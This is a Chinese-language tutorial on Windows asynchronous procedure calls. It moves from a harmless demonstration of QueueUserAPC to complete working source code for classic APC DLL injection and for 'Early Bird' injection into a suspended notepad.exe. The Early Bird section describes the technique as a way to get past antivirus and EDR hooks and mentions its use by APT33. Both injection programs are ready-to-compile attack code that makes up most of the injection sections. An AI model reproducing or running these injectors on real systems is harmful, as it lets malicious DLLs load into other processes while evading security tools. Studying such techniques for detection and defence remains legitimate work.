1. APC 介绍

1.1 定义

根据 MSDN 上的定义， APC（Asynchronous Procedure Call 异步过程调用）是在特定线程的上下文中异步执行的函数。具体来说，每个 APC 函数是与特定线程相关联的，每个线程有 APC 队列，存储着 APC 函数。但这并不是说线程被创建和执行了， APC 就一定会被调用。一般情况下，用户态线程调用 APC 函数要具备两个条件：

线程的 APC 队列不为空，存有可供调用的APC函数；
线程处于可警告（Alertable）状态；

（本文暂不讨论内核态的 APC）

1.2 线程何时处于可警告的状态

线程在调用 SleepEx，SignalObjectAndWait， MsgWaitForMultipleObjectsEx，WaitForMultipleObjectsEx或WaitForSingleObjectEx函数时进入可警告状态。

1.3 如何手动增加 APC 函数

与用户态APC相关的函数只有一个：QueueUserAPC。QueueUserAPC 函数允许将一个用户定义的函数添加到指定线程对应的APC队列中。

DWORD QueueUserAPC(
  [in] PAPCFUNC  pfnAPC,   //指向一个APC函数
  [in] HANDLE    hThread,  //将要插入APC的线程句柄，句柄必须具有 THREAD_SET_CONTEXT 访问权限。 
  [in] ULONG_PTR dwData    //APC函数的参数
);
//如果该函数成功，则返回值为非零值。如果函数失败，则返回值为零。

1.4 APC 的执行顺序

先进先出，即先被加入 APC 队列的函数会在线程处于可警告状态时，会先被执行。下面有一个小的测试程序

#include <stdio.h>
#include <windows.h>
 
// APC 函数
VOID CALLBACK MyAPCProc1(ULONG_PTR dwParam) {
    printf("MyAPCProc1已被调用: %lu\n", dwParam);
}
 
VOID CALLBACK MyAPCProc2(ULONG_PTR dwParam) {
    printf("MyAPCProc2已被调用: %lu\n", dwParam);
}
 
int main() {
    // 获取当前线程的 ID
    DWORD threadId = GetCurrentThreadId();
    // 打开当前线程 (实际上不需要打开，GetCurrentThreadId() 已经给我们了句柄)
    HANDLE hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT, FALSE, threadId);
    if (hThread == NULL) {
        fprintf(stderr, "线程打开失败: %lu\n", GetLastError());
        return 1;
    }
 
    // 将 APC 排队到当前线程
    DWORD result1 = QueueUserAPC(MyAPCProc1, hThread, 123);  // 123 是传递给 MyAPCProc1 函数的参数
    if (result1 == 0) {
        fprintf(stderr, "MyAPCProc1加入APC队列失败: %lu\n", GetLastError());
        CloseHandle(hThread);
        return 1;
    }
    printf("函数MyAPCProc1已被被加入到线程的APC队列中。\n");
    DWORD result2 = QueueUserAPC(MyAPCProc2, hThread,456);  // 456 是传递给 MyAPCProc2 函数的参数
    if (result2 == 0) {
        fprintf(stderr, "MyAPCProc2加入APC队列失败: %lu\n", GetLastError());
        CloseHandle(hThread);
        return 1;
    }
 
    printf("函数MyAPCProc2已被被加入到线程的APC队列中。\n");
    printf("即将进入可警告状态 (SleepEx).\n");
 
    // 进入可警告状态 (SleepEx),  这是 APC 执行所必需的
    SleepEx(INFINITE, TRUE); // TRUE 表示进入可警告状态
 
    // 即使线程进入可警告状态，APC函数也可能还未完成
    CloseHandle(hThread);
    printf("退出主线程\n");
    return 0;
}

运行结果如下图所示：

如果删掉SleepEx(INFINITE, TRUE)，线程不处于可警告状态，那么两个 APC 函数就不会被调用，运行结果如下图所示：

2. APC 注入

2.1 原理

APC注入是利用Windows的异步过程调用机制 APC，将代码注入到目标线程的APC队列。当线程进入可警告状态（如调用SleepEx）时，系统会执行APC队列中的函数，从而实现代码注入。

2.2 被注入程序

将下面代码编译成APCTest.exe程序在主线程启动后，一直处于可警告状态，方便注入。

#include <stdio.h>
#include <Windows.h>
 
int main()
{
    while (1)
    {
        printf("小心注入\r\n");
        SleepEx(1000, TRUE);
    }
 
    return 0;
}

2.3 APC 注入程序

为了让代码简洁一点，就直接根据由 PCHunter 的APCTest.exe进程 PID 获取进程句柄，根据线程 ID 获取线程句柄。

#include <stdio.h>
#include <Windows.h>
 
int main()
{
    //打开进程
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 1111);//根据实际情况获取PID
    if (!hProcess)
    {
        printf("进程打开失败\r\n");
        return -1;
    }
    //打开线程
    HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, 2222);//根据实际情况获取线程ID
    if (!hThread)
    {
        printf("打开线程失败\r\n");
        return -1;
    }
 
    //获取loadlibraryA
    HMODULE hModule = GetModuleHandleA("kernel32.dll");
    PVOID func = (PVOID)GetProcAddress(hModule, "LoadLibraryA");
    printf("%x\r\n", func);
    system("pause");
 
    //给目标进程申请内存,存dll路径
    PUCHAR targetMemory = (PUCHAR)VirtualAllocEx(hProcess, NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!targetMemory)
    {
        printf("申请内存失败\r\n");
        return -1;
    }
    printf("targetMemony :%x\r\n", targetMemory);
    system("pause");
 
    //dll路径
    char* dllpath = "C:\\Users\\finback\\Desktop\\MyDll.dll";
    //给目标进程写内容 
    if (!WriteProcessMemory(hProcess, targetMemory, dllpath, strlen(dllpath) + 1, NULL))
    {
        printf("写入失败\r\n");
        return -1;
    }
 
    QueueUserAPC((PAPCFUNC)func, hThread, (ULONG_PTR)targetMemory);
    system("pause\r\n");
    return 0;
}

运行结果如下图所示：

PCHunter 查看运行的APCTest.exe进程模块中多了注入的 MyDll.dll。

3. Early Bird 注入

3.1 技术起源

反病毒软件和 EDR 等安全产品通过 Hook 关键的 Windows API（如 CreateProcess、CreateRemoteThread、LoadLibrary等）来监控和拦截可疑的代码注入行为。为了规避上述安全机制，Early Bird 注入（早鸟注入）应运而生。它的核心目标是在目标进程初始化阶段，安全机制尚未完全加载或生效时，完成代码注入。伊朗黑客组织 APT33 利用该项注入技术将 TrunedUp 恶意软件植入受感染系统内部，并绕过反病毒软件工具。2018年4月11日，网络安全公司 Cyberbit 的研究人员发表了一篇名为《New ‘Early Bird’ Code Injection Technique Discovered》的文章，详细分析了 Early Bird 注入的原理和实现。

3.2 原理

Early Bird 注入是指一种利用Windows进程创建机制进行代码注入的技术。其原理是在目标进程的主线程开始执行之前，将代码注入到进程中。具体步骤包括：

以挂起状态（CREATE_SUSPENDED）创建目标进程；
在目标进程中分配内存并写入恶意代码；
修改主线程的上下文或将写入的恶意代码添加到 APC 队列中；
在主线程执行前，执行写入的恶意代码；
恢复主线程；

这种方法隐蔽性高，适用于新创建的进程。下面就介绍如何使用APC机制进行Early Bird 注入。

3.3 关键 API

Early Bird注入技术的关键在于利用ntdll中的未导出函数NtTestAlert，其用户态对应函数为ZwTestAlert。这一机制确保了线程在初始化阶段处理潜在的残留异步过程调用（APC），从而在用户态代码执行前建立一个干净的执行环境。

当线程被创建时，其APC队列理论上为空。然而，在某些情况下，由于内核操作或之前的线程状态，可能会残留APC。NtTestAlert的功能即是在线程初始化时检查并处理这些残留的APC，执行后清空队列。这一操作确保了线程以可预测的状态启动，避免残留APC对程序执行产生干扰，进而防止潜在的异常、崩溃或安全漏洞。

Early Bird注入正是利用这一机制，在线程初始化阶段注入代码，使其在主线程开始执行前运行。

3.4 Early Bird 注入程序

#include <stdio.h>
#include <Windows.h>
 
int main() {
    char* dllpath = "C:\\Users\\finback\\Desktop\\MyDll.dll";
 
    // 初始化STARTUPINFO和PROCESS_INFORMATION结构
    STARTUPINFOA st = { 0 };
    PROCESS_INFORMATION prt = { 0 };
    st.cb = sizeof(st); 
 
    // 以挂起状态创建目标进程（如notepad.exe）
    if (!CreateProcessA(
        "C:\\Windows\\System32\\notepad.exe", //目标进程路径
         NULL, NULL, NULL, FALSE, 
         CREATE_SUSPENDED,                    //创建挂起状态
         NULL, NULL, &st, &prt )) 
    {
        printf("无法创建目标进程，错误代码: %d\n", GetLastError());
        return 1;
    }
 
    // 获取目标进程和主线程的句柄
    HANDLE victimProcess = prt.hProcess;
    HANDLE threadHandle = prt.hThread;
 
    // 在目标进程中分配内存，用于存储Shellcode
    PUCHAR shellAddr = (PUCHAR)VirtualAllocEx(
        victimProcess, NULL, 0x1000, MEM_COMMIT, 
        PAGE_EXECUTE_READWRITE // 内存权限：可执行、可读、可写
    );
    if (shellAddr == NULL) {
        printf("无法在目标进程中分配内存，错误代码: %d\n", GetLastError());
        TerminateProcess(victimProcess, 0); // 终止目标进程
        CloseHandle(victimProcess);
        CloseHandle(threadHandle);
        return 1;
    }
 
    // 将dll写入目标进程的内存
    if (!WriteProcessMemory(
            victimProcess, shellAddr, dllpath,  
            strlen(dllpath) + 1,NULL)) 
    {
        printf("无法写入目标进程内存，错误代码: %d\n", GetLastError());
        VirtualFreeEx(victimProcess, shellAddr, 0, MEM_RELEASE); // 释放内存
        TerminateProcess(victimProcess, 0); // 终止目标进程
        CloseHandle(victimProcess);
        CloseHandle(threadHandle);
        return 1;
    }
     
    HMODULE hModule = GetModuleHandleA("kernel32.dll");
    PVOID func = (PVOID)GetProcAddress(hModule, "LoadLibraryA");
 
    // 将APC函数排入目标线程的APC队列
    if (!QueueUserAPC(
            (PAPCFUNC)func,      // APC函数
            threadHandle,        // 目标线程句柄
            (ULONG_PTR)shellAddr // 传递给APC函数的参数
        )) {
        printf("无法队列APC，错误代码: %d\n", GetLastError());
        VirtualFreeEx(victimProcess, shellAddr, 0, MEM_RELEASE); // 释放内存
        TerminateProcess(victimProcess, 0); // 终止目标进程
        CloseHandle(victimProcess);
        CloseHandle(threadHandle);
        return 1;
    }
 
    // 恢复目标线程的执行
    ResumeThread(threadHandle);
 
    // 关闭句柄
    CloseHandle(victimProcess);
    CloseHandle(threadHandle);
 
    printf("注入成功\n");
    return 0;
}